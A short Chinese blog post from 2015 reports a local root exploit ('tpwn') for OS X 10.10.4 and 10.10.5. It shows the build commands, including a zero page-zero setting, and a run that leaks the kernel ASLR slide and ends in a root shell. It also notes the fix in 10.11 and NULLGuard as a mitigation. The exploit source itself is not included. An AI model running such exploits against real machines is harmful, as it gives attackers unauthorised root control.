os x 10.10.5 又一提权漏洞
Contents
[NOTE] Updated August 21, 2015. This article may have outdated content or subject matter.
测试代码下载
测试结果:
⇒ make
gcc *.m -o tpwn -framework IOKit -framework Foundation -m32 -Wl,-pagezero_size,0 -O3
strip tpwn
⇒ ./tpwn
leaked kaslr slide, @ 0x0000000002600000
sh-3.2# whoami
root
sh-3.2#
又是一个0day了,目前有10.11上面才修复了,这个影响了10.10.4和10.10.5两个版本,如果不想升级10.11的,可以安装NULLGuard
Author beyondkmp
LastMod 2015-08-21